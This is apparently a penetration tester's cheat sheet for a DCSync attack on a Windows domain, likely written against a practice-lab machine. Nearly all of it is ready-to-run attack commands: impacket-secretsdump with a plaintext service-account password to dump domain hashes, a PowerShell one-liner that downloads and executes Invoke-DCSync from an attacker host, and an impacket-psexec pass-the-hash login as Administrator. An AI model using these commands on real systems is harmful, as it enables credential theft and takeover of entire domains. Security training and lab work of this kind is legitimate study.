DCSync

Identification from bloodhound

Secretsdump

target IP is Domain Controller

impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP

or specific user with -just-dc-user <username>

impacket-secretsdump EGOSTISCAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$IP -just-dc-user Administrator

Invoke-DCSync.ps1

https://github.com/pentestfactory/Invoke-DCSync

iex(new-object net.webclient).downloadstring('http://10.10.x.y/Invoke-DCSync.ps1'); Invoke-DCSync

Using Hash from DCSync

login using psexec and pass the hash

impacket-psexec egostical-bank.local/administrator@$IP -hashes 823452073d75b9d1cf70ebdf86c7f98e:823452073d75b9d1cf70ebdf86c7f98e

a